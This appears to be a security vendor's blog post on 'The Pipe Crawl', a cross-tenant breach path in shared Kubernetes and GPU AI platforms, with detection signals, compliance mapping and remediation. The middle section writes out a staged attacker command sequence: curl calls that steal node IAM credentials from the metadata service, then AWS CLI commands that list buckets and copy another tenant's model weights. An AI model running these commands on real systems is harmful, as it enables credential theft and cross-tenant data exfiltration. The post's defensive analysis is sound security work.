Executive Summary
- We track this pattern as The Pipe Crawl: a single compromised AI workload sliding through shared GPU VRAM, shared Kubernetes networking, and shared node identity to reach every other tenant on the same cluster.
- GPU cost pressure is driving dense multi-tenancy in AI inference platforms, which collapses container boundaries into shared plumbing.
- One compromised workload can pivot to other organizations' models, data, and credentials via IMDS, registry poisoning, or GPU memory residuals (CVE-2023-4969, "LeftOvers").
- Until you isolate hardware, registries, and node identity, one customer's breach is every customer's breach on the same cluster.
- Arrakis treats every AI workload as untrusted by default and tags every inference request with a tenant identity, so a Pipe Crawl attempt fails at the boundary instead of at the audit.

Scope & Assumptions
Why this matters
Multi-tenancy turns one breach into many.
When AI platforms optimize for utilization, they often treat containers and namespaces as a hard boundary. In practice, that boundary is soft, and the pipes between cells are wide:
- Kubernetes misconfigurations and over-privileged nodes make lateral movement realistic.
- Shared build systems and registries expand blast radius across tenants.
- GPU memory reuse can leak data even when network paths are locked down.
The walls look like concrete. The plumbing is what carries the breach.

The Origin Story (Discovery)
The illusion of "secure multi-tenancy" in AI platforms collapses when you stop looking only at the models and start looking at the infrastructure they run on.
A strong demonstration came from Wiz Research, who analyzed Hugging Face's tenant-isolation architecture. The initial access path was not exotic. It used a malicious pickle model (a known vector) to obtain code execution and a reverse shell.
From there, the escalation path looked like classic cloud compromise:
- Query the Amazon EKS Instance Metadata Service (IMDS)
- Extract node-level IAM credentials
- Use those credentials to enumerate and access other customers' assets sharing the cluster
In parallel, researchers highlighted another critical risk: Hugging Face Spaces accepted user-provided Dockerfiles with insufficient build isolation. That made it possible to write into a centralized container registry serving all platform customers.
Finally, CVE-2023-4969 ("LeftOvers") demonstrated that isolation can fail at the silicon level. GPU memory reuse can expose residual data from other tenants that previously shared the same physical GPU.
Message: if you share hardware in the AI ecosystem, you should assume you share risk and potentially share data.
The Technical Autopsy: Crawling the Pipes
The Pipe Crawl starts with an entry vector and then traverses one or more pipes between cells. The entry vector is most often the pickle pipe - code execution from a malicious model upload, poisoned RAG document, or CI/CD injection. Once inside, four pipes connect the compromised cell to every other tenant on the cluster:
- The IMDS pipe - reach the host's metadata service from inside a pod and steal the node IAM role
- The Identity pipe - use that node identity to call cloud APIs the pod was never meant to call
- The Registry pipe - poison or pull from a shared container registry that serves every tenant
- The GPU VRAM pipe - read residual memory left by a previous tenant's inference job
Most real-world Pipe Crawls chain pipes 1, 2, and either 3 or 4. The IMDS and Identity pipes are the fastest path; the GPU VRAM pipe is the stealthiest.
| Arrow | Pipe | What flows through it |
|---|---|---|
| ━━ | IMDS pipe | Compromised pod → host metadata service to steal the node IAM role |
| ━━ | Identity pipe | Node IAM role → cross-tenant cloud API calls (S3, ECR, secrets) |
| ━━ | Registry pipe | Compromised pod → shared container registry; ╌╌ poisoned images served to other tenants |
| ━━ | GPU VRAM pipe | Compromised pod → same physical GPU; ╌╌ residual VRAM from previous tenant's job is readable |
Framework mapping: MITRE ATLAS AML.T0010 (ML Supply Chain Compromise) and AML.T0049 (Exploit Public-Facing Application) cover the pickle entry and the boundary escape. AML.T0024.001 (Infer Training Data Membership) maps the GPU residual case. OWASP LLM03 Supply Chain and LLM05 Improper Output Handling anchor the pickle entry point.
The cleanest illustration is to walk the chain end to end. We start inside a container on a shared EKS node - the pickle pipe has already given us code execution via a malicious model upload. Every line below is a real command an attacker runs, in order.
# STAGE 1 - The IMDS pipe: steal the node's IAM identity from inside our pod.
# EKS managed node groups commonly ship with httpPutResponseHopLimit = 2,
# which means a container can reach the host's IMDS even when IMDSv2 is "enforced".
TOKEN=$(curl -sX PUT "http://169.254.169.254/latest/api/token" \
-H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
ROLE=$(curl -s -H "X-aws-ec2-metadata-token: $TOKEN" \
http://169.254.169.254/latest/meta-data/iam/security-credentials/)
curl -s -H "X-aws-ec2-metadata-token: $TOKEN" \
http://169.254.169.254/latest/meta-data/iam/security-credentials/$ROLE
# {
# "AccessKeyId": "ASIA...",
# "SecretAccessKey": "...",
# "Token": "...",
# "Expiration": "2026-01-29T18:30:00Z"
# }
# STAGE 2 - Wear the node's identity in our own shell.
# This role is attached to the host, not the pod. Every workload scheduled on
# this node - including other tenants' pods - shares it.
export AWS_ACCESS_KEY_ID="ASIA..."
export AWS_SECRET_ACCESS_KEY="..."
export AWS_SESSION_TOKEN="..."
# STAGE 3 - Cross-tenant access via the Identity pipe: read assets we never owned.
# Enumerate every S3 bucket this node role can see. The result almost always
# includes other customers' model and dataset buckets.
aws s3 ls
# Walk into a competing tenant's private model bucket and exfiltrate weights
# using the cluster's own credentials. To S3, this looks like normal cluster traffic.
aws s3 cp s3://acme-prod-models/checkpoint.safetensors ./loot.safetensorsThe threat lands at the JSON drop in Stage 1: AccessKeyId, SecretAccessKey, Token are node-level cloud identity, not pod identity. By Stage 3 the attacker is reading a competing tenant's model weights with the cluster's own credentials - no zero-day, no exploit, just the plumbing the platform itself wired up.
If an attacker can exploit a GPU memory side-channel (CVE-2023-4969), they may not need a network path at all. They can allocate GPU memory and read residual, un-wiped VRAM left behind by another tenant's inference job. No alert fires, because nothing crossed the network boundary.
Attacker Goals and Impact
The Pipe Crawl is optimized for espionage and mass data theft.
AI platforms centralize high-value assets:
- Proprietary model weights
- Customer datasets
- Source code and internal documentation
- Sensitive user conversations and prompts
By targeting shared compute infrastructure rather than a single application, attackers gain economy of scale. One Pipe Crawl can compromise dozens of organizations in a single chain, and it can trigger regulatory exposure under SOC 2, GDPR, and the EU AI Act.
Detection & Response
This is the operational layer. Each signal below is tagged with the pipe it monitors so the reader knows where the alert lives in the architecture.
| Pipe | Signal | What to alert on |
|---|---|---|
| IMDS pipe | IMDS access from container | Any HTTP request to 169.254.169.254 originating from a pod CIDR |
| IMDS pipe | IMDSv1 fallback | Requests to IMDS without the X-aws-ec2-metadata-token header |
| Identity pipe | STS calls from pod identity | AssumeRole or GetCallerIdentity from a node role inside a workload namespace |
| Registry pipe | Cross-namespace registry pulls | Image pulls referencing a tenant-foreign namespace path |
| GPU VRAM pipe | Residual access pattern | Workloads allocating GPU memory immediately after another tenant's job ends on the same device |
169.254.169.254 - should be zero in a hardened clusterhostNetwork: true or unrestricted IMDS hop limitsts:AssumeRole calls where the source identity is a node role and the session is initiated from a workload subnetGovernance & Assurance
This section answers three questions: are we exposed, what are we accountable for, and what proves we are handling it.
- The Pipe Crawl is an infrastructure-layer failure, not a model-layer failure. It does not show up in model evaluations, red-team transcripts, or prompt-injection benchmarks. It surfaces in cloud security posture, Kubernetes hardening, and supply-chain controls.
- A single Pipe Crawl event is a multi-customer breach event by definition. Disclosure obligations, contractual MSAs, and regulator timelines are triggered for every co-tenant on the affected node, cluster, or GPU - not just the one that was first compromised.
| Framework | Relevant control | Required evidence |
|---|---|---|
| SOC 2 (CC6.1, CC6.6) | Logical access boundaries between tenants | Network policy, IAM segmentation, registry isolation |
| ISO 27001 A.8.22 | Segregation of networks | Per-tenant namespace and network policy proof |
| NIST AI RMF (Manage 2.3) | Third-party AI risk management | Inventory of shared AI infra dependencies |
| GDPR Art. 32 | Security of processing | Demonstrable hardware or cryptographic isolation for personal data workloads |
| EU AI Act (Art. 15) | Cybersecurity of high-risk AI systems | Documented isolation architecture and breach-containment design |
The Fallout (Systemic Failure)
The root cause is a business tradeoff, not a technical inevitability.
To offset GPU cost, platforms pack as many workloads onto a cluster as possible. That density frequently comes with:
- Shared container registries
- Permissive cross-namespace networking
- Over-privileged nodes
- IMDS exposure from workloads
- GPU pools with no scrubbing between tenants
Wiz Research and LeftOvers are reminders that treating containerization as a hard security boundary is a mistake. The container is the cell. The cluster is the prison. The pipes are how you get out.
How Arrakis sees The Pipe Crawl
Most AI security tooling stares at the cell door - the model, the prompt, the output filter. The Pipe Crawl is what happens when you stop watching the door and start watching the pipes: the shared GPU, the shared cluster, the shared registry, the shared node identity.
We see The Pipe Crawl as the canonical example of a Tier 3 cross-boundary violation: an attack that uses an AI workload as a beachhead but spends most of its life cycle in classic cloud-infrastructure territory. That is why model-layer guardrails miss it entirely, and why posture tools that do not model tenancy cannot tell you who is actually exposed when one tenant is compromised.
Arrakis approaches multi-tenant AI infrastructure from three angles:
- Tenant identity at the request layer - every inference and tool call is tagged with a tenant, so cross-tenant access fails closed instead of leaking through shared identity
- Blast-radius mapping for the pipes - continuous inventory of which workloads share clusters, GPUs, and registries, so a single compromise produces a deterministic list of co-exposed tenants
- AI-aware detections for the cloud control plane - the IMDS, STS, registry, and GPU-residual signals from the Detection section above, correlated against AI workload identity rather than just pod identity
Remediation
Engineering teams should design AI infrastructure assuming containers will be breached. Close the obvious pipes this sprint, then re-pour the walls this quarter.
169.254.169.254 from all AI workload podsNetworkPolicy between AI workload namespaces| Indicator Type | Value | Description |
|---|---|---|
| Vulnerability | CVE-2023-4969 | "LeftOvers" vulnerability describing GPU memory leaks that enable cross-tenant data exfiltration. |
| Network Target | 169.254.169.254 | The cloud Instance Metadata Service (IMDS) IPv4 endpoint, commonly targeted during container escapes. |
| Attack Vector | IMDS EKS Escape | Escalation from container execution to node-level credentials via Amazon EKS IMDS. |
| Attack Vector | Shared Container Registry | Insufficient build isolation allowing rogue Dockerfiles to poison centralized registries serving multiple customers. |
The walls of container isolation are advertised as concrete. The Pipe Crawl is the reminder that every cluster also has plumbing, and the plumbing connects every cell. Until the pipes are isolated, the threat model is shared, and so is the breach.
Stay in the loop
Get the latest from Arrakis Security delivered to your inbox.




